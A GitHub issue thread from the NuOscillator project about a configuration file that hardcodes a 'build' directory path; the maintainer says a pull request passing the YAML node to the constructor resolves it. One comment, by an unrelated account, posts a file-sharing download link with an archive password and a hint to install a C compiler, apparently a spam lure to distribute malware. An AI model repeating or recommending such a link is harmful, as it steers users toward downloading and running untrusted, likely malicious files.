### ISSUE TITLE
Stop with using build in config path

### ISSUE THREAD

**Issue by KSkwarczynski** [dbarrow257/NuOscillator#28]
Here in path you have build
https://github.com/dbarrow257/NuOscillator/blob/9df59b1b276588b973778dfb297dc2291dbc09ae/Configs/Unbinned_CUDAProb3.yaml#L7

this is super unintutive, first of all some can build not in build folder then it breaks.

**Comment by pinpolhoxx** [comment]
download
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive codepass: changeme

you may need to install the c compiler

**Comment by dbarrow257** [comment]
Done once this PR has been merged: https://github.com/dbarrow257/NuOscillator/pull/33

Allows pass through of Oscillator YAML::Node to the constructor of the OscProbCalcerBase::OscProbCalcerBase() object so configs don't have to reference configs.
